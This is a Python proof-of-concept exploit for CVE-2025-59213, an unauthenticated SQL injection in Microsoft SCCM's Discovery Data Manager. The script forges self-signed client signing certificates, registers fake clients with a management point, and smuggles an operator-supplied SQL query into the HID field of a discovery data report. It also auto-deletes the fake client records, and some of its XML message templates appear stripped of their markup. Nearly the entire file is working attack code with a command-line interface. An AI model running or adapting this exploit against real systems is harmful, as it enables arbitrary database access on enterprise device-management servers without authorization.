#!/usr/bin/env python3 import argparse import datetime import random import re import uuid import zlib from time import sleep from urllib.parse import urlparse import requests import urllib3 from cryptography import x509 from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15 from cryptography.x509 import ObjectIdentifier from cryptography.x509.oid import NameOID urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def time1(): return datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") def time2(): return datetime.datetime.now(datetime.timezone.utc).strftime("%Y%m%d%H%M%S.%f") + "+000" def time3(): return datetime.datetime.now(datetime.timezone.utc).strftime("%d/%m/%Y %H:%M:%S") # from https://github.com/xpn/sccmwtf class CryptoTools: @staticmethod def createCertificateForKey(key, cname): subject = issuer = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, cname), ]) cert = x509.CertificateBuilder().subject_name( subject ).issuer_name( issuer ).public_key( key.public_key() ).serial_number( x509.random_serial_number() ).not_valid_before( datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=2) ).not_valid_after( datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365) ).add_extension( x509.KeyUsage(digital_signature=True, key_encipherment=False, key_cert_sign=False, key_agreement=False, content_commitment=False, data_encipherment=True, crl_sign=False, encipher_only=False, decipher_only=False), critical=False, ).add_extension( # SMS Signing Certificate (Self-Signed) x509.ExtendedKeyUsage([ObjectIdentifier("1.3.6.1.4.1.311.101.2"), ObjectIdentifier("1.3.6.1.4.1.311.101")]), critical=False, ).sign(key, hashes.SHA256()) return cert @staticmethod def generateRSAKey(): key = rsa.generate_private_key(public_exponent=65537, key_size=2048) return key @staticmethod def buildMSPublicKeyBlob(key): # Built from spec: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb blobHeader = b"\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31\x00\x08\x00\x00\x01\x00\x01\x00" blob = blobHeader + key.public_key().public_numbers().n.to_bytes(int(key.key_size / 8), byteorder="little") return blob.hex().upper() # Signs data using SHA256 and then reverses the byte order as per SCCM @staticmethod def sign(key, data): # signature = key.sign(data, PSS(mgf=MGF1(hashes.SHA256()), salt_length=PSS.MAX_LENGTH ), hashes.SHA256()) signature = key.sign(data, PKCS1v15(), hashes.SHA256()) signature_rev = bytearray(signature) signature_rev.reverse() return bytes(signature_rev) @staticmethod def decrypt(key, data): print(key.decrypt(data, PKCS1v15())) @staticmethod def load_privatekey_from_pem(pem): return serialization.load_pem_private_key(pem, password=None) @staticmethod def dump_privatekey_to_pem(key): pem = key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption() ) return pem @staticmethod def dump_cert_to_pem(cert): pem = cert.public_bytes( encoding=serialization.Encoding.PEM ) return pem class SCCM: tpl_multipart = b"--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ--" tpl_ccm_header = """ {ID} {SMSID} {SOURCE_HOST} direct:dummy:dummy {TARGET_HOST} {TARGET_ENDPOINT} mp:{TARGET_ENDPOINT} 3 direct:dummy:dummy 86400 http {REPLY_MODE} {TIME} {ATTACHMENT} {CLIENT_AUTH} direct:{SOURCE_HOST}:ClientRegistration""" tpl_hook2_clientauth = """{SOURCE_HOST}1.2.840.113549.1.1.11NonSSL{PayloadSignature}""" tpl_attachment_header = """""" # MP_ClientRegistration tpl_client_registration_request = """{DATA}{PAYLOAD_SIGNATURE}""" # tpl_client_registration_data = """{encryption}{signature}""" # MP_DdrEndpoint tpl_ddr_report = """ 1 1 {SMSID} {CLIENT_VERSION} {SOURCE_HOST} 437 1033 Inventory Data Full {TIME2} 9.0 1.1 {{00000000-0000-0000-0000-000000000003}} Discovery {TIME2} {TIME3} {OLDSMSID} {HID} """ def __init__(self, target, key, cert, client_sign_key, sqlcmd, altAuth=False, autoClean=True, verbose=False): self._target = target self._target_url = f"{target}/ccm_system_altauth/request" if altAuth else f"{target}/ccm_system/request" self._pkey = key self._cert = cert # gen and persist cert if one isn't provided via cmdline if client_sign_key is None: self.signkey = CryptoTools.generateRSAKey() keyfname = f'/tmp/sccm_poc.key' print(f"[+] Generated new signing key, saved to {keyfname}") with open(keyfname, 'wb') as f: f.write(CryptoTools.dump_privatekey_to_pem(self.signkey)) else: self.signkey = CryptoTools.load_privatekey_from_pem(open(client_sign_key,'rb').read()) self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client") self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper() self.SMSID = "" self.OLDSMSID = "" self.CLIENT_VERSION = random.randint(1, 999) # marker for cleaning # clean registered client self.auto_clean_cmd = f"delete from System_DISC where Client_Version0='{self.CLIENT_VERSION}';" if autoClean else '' # injection vector self.HID = f"{self.CLIENT_VERSION}';{self.auto_clean_cmd}{sqlcmd}-- " self.TARGET_HOST = urlparse(self._target_url).hostname self.SMBIOS_GUID0 = uuid.uuid4().__str__().upper() self.verbose = verbose def _debug(self, m): if self.verbose: print(m) def __ccm_post(self, data): headers = {"User-Agent": "ConfigMgr Messaging HTTP Sender", "Content-Type": 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'} # self._debug(f">>>> HTTP Request <<<<<\n{data.decode('utf-16-le')}\n") r = requests.request("CCM_POST", self._target_url, headers=headers, data=data, verify=False, cert=(self._cert, self._pkey)) self._debug(f">>>> HTTP Response : {r.status_code} <<<<<\n{r.text}\n") return r.content def __ccm_messaging_request(self, endpoint, body, attachment=b"", clientSMSID="", clientname="", clientauth=False, isAsync=False): MSGID = f'{{{uuid.uuid4().__str__().upper()}}}' print(f"[+] CcmMessage : ID={MSGID}") final_body = body + attachment + b"\x00\x00" compressedbody = zlib.compress(final_body) clientsig = "" if clientauth: print("[+] CcmMessage : adding clientauth") clientsig = self.tpl_hook2_clientauth.format(SOURCE_HOST=clientname, PayloadSignature=self.sign(compressedbody)) attachment_header = "" if len(attachment): print("[+] CcmMessage : adding attachment") attachment_header = self.tpl_attachment_header.format(LENGTH=len(attachment), OFFSET=len(body), NAME="Attachment1") ccm_header = self.tpl_ccm_header.format(LENGTH=len(final_body), ID=MSGID, TARGET_HOST=self.TARGET_HOST, TARGET_ENDPOINT=endpoint, REPLY_MODE="Sync" if not isAsync else "Async", TIME=time1(), SMSID=clientSMSID, SOURCE_HOST=clientname, ATTACHMENT=attachment_header, CLIENT_AUTH=clientsig) multipart_body = self.tpl_multipart % (ccm_header.encode("utf-16"), compressedbody) # self._debug(f">>>> CcmMessaging Header <<<<<\n{ccm_header}\n") self._debug(f">>>> CcmMessaging Body <<<<<\n{final_body.decode()}\n") return self.__ccm_post(multipart_body) def sign(self, data): return CryptoTools.sign(self.signkey, data).hex().upper() def register_client(self, clientname): self.SOURCE_HOST = clientname b = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper() reg_data = self.tpl_client_registration_data.format(SMSID="", TIME=time1(), CLIENT_NAME=clientname, encryption=self.signcert_hex, signature=self.signcert_hex, SMBIOSID=self.SMBIOS_GUID0, CLIENT_VERSION=self.CLIENT_VERSION) sig = self.sign(reg_data.encode('utf-16-le')) client_registration_request = self.tpl_client_registration_request.format(DATA=reg_data, PAYLOAD_SIGNATURE=sig) rsp = self.__ccm_messaging_request('MP_ClientRegistration', body=client_registration_request.encode('utf-16-le'), attachment=b"", clientSMSID=self.SMSID, clientname=self.SOURCE_HOST, clientauth=False) deflatedData = zlib.decompress(rsp.split(b'--aAbBcCdDv1234567890VxXyYzZ')[2].split(b'\r\n')[3]).decode('utf-16-le') # print(deflatedData) r = re.findall("SMSID=\"([^\"]+)\"", deflatedData) if r != None: SMSID = r[0] print(f"[+] Got SMSID = {SMSID} for new client {clientname}") sleep(1) return SMSID else: print("[!] Failed to register client") return None def send_ddr_report(self, clientname): report_attachment = self.tpl_ddr_report.format(SMSID=self.SMSID, OLDSMSID=self.OLDSMSID, HID=self.HID, SOURCE_HOST=self.SOURCE_HOST, CLIENT_VERSION=self.CLIENT_VERSION, TIME2=time2(), TIME3=time3()) print(f'[+] Sending DDR report: SMSID={self.SMSID} OLDSMSID={self.OLDSMSID}') rsp = self.__ccm_messaging_request('MP_DdrEndpoint', body=b"", attachment=report_attachment.encode('utf-16-le'), clientSMSID=self.SMSID, clientname=self.SOURCE_HOST, clientauth=True, isAsync=True) if 'NoReply'.encode('utf-16-le') in rsp : print('[+] DDR report sent successfully') def exploit(self, clientname, delay=10): assert delay >= 2 self.SMSID = self.register_client(clientname) # create new cert to force a new SMSID (new versions) self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client") self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper() self.OLDSMSID = self.register_client(clientname) assert self.SMSID != self.OLDSMSID # mandatory sleep(delay) self.send_ddr_report(clientname) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection") parser.add_argument("-t", "--target", action="store", required=True, default=None, help="Target (http://sccm-mp.local/)") parser.add_argument("-sk", "--sigkey", action="store", required=False, default=None, help="SMS signature key (automatically generated if omitted)") parser.add_argument("-k", "--key", action="store", required=False, default=None, help="Private key file for mTLS") parser.add_argument("-c", "--cert", action="store", required=False, default=None, help="Certificate file for mTLS") parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="Verbose output, print requests") parser.add_argument("-cn", "--client-name", action="store", required=True, default=False, help="Name of the client that will be created in SCCM") parser.add_argument("-rs", "--registration-sleep", action="store", required=False, default=10, help="The amount of time, in seconds, that should be waited after registrating a new device (2 seconds by default)") parser.add_argument("-a", "--altauth", action="store_true", required=False, default=False, help="Use the MP's alternate authentication endpoint") parser.add_argument("-sql", action="store", required=True, default=None, help="Query to execute through the SQL injection") parser.add_argument("-nc", "--no-clean", action="store_true", required=False, default=None, help="Do not automatically clean the registred devices") options = parser.parse_args() SCCM(options.target, options.key, options.cert, options.sigkey, options.sql, altAuth=options.altauth, autoClean=(not options.no_clean), verbose=options.verbose).exploit(options.client_name, int(options.registration_sleep))